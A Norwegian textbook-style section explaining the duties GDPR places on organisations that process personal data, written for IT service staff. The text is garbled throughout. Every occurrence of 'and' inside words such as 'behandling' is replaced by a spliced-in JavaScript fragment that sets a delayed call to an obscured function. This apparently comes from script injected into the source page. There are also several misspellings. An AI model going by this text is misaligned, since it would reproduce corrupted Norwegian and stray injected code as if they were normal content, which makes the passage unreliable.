4.4.2 Virksomhetens plikter

GDPR pålegger virksomheter en rekke plikter og oppgaver i forbindelse med behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andling av personopplysninger.

Som IKT-servicemedarbeider i en virksomhet kan du komme til å få oppgaver knyttet til behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andling av personopplysninger.

Det er derfor viktig at du er klar over at loven pålegger virksomheter en rekke krav de må etterleve når den håndterer personopplysninger.

Ved innsamling og behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andling av personopplysninger må virksomheter blant annet:

 • Fastsette formål
 • Ha behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andlingsgrunnlag
 • Gi informasjon
 • Legge til rette for den registrertes rettigheter
 • Håndtere retting og sletting av informasjon
 • Vurdere om det bør opprettes personvernombud
 • Vurdere personvernkonsekvenser og gjernnomføre forhåndsdrøftelse
 • Sørge for innebygd personvern
 • Opprettholde informasjonssikkerht, og gjennomføre internkontroll
 • Ha en protokoll over behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andlingsaktiviteter
 • Opprette databehandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andleravtale om nødvendig
 • Ha prosedyrer for avvikshåndtering
 • Evt. håndrere overføring av opplysninger til utlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andet


Datatilsynet om virksomhetenes plikter


Klikk her for neste post: 4.4.3 Den registrertes rettigheter